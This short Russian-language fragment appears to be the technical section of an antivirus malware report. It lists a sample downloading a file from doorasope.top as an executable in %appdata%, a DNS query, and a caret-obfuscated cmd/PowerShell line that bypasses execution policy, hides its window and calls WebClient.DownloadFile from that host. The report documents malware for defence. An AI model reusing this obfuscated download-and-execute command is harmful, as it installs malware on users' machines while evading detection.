Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^e^RSHELL^.exe -e^XecuTionPO^l^i^cy ^B^y^P^a^S^S^ -N^o^PR^oFiL^E ^-w^INd^OW^stYL^E HIDDeN ^(n^E^w-o^Bj^e^c^T^ ^sYS^tE^m.^neT^.^webcl^IE^N^T^).dOWnlOAd^F^I^lE('http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "POw^e^RSHELL^.exe -e^XecuTionPO^l^i^cy ^B^y^P^a^S^S^ -N^o^PR^oFiL^E ^-w^INd^OW^stYL^E HIDDeN ^(n^E^w-o^Bj^e^c^T^ ^sYS^tE^m.^neT^.^webcl^IE^N^T^).dOWnlOAd^F^I^lE('http://www.doo...' (со скрытым окном)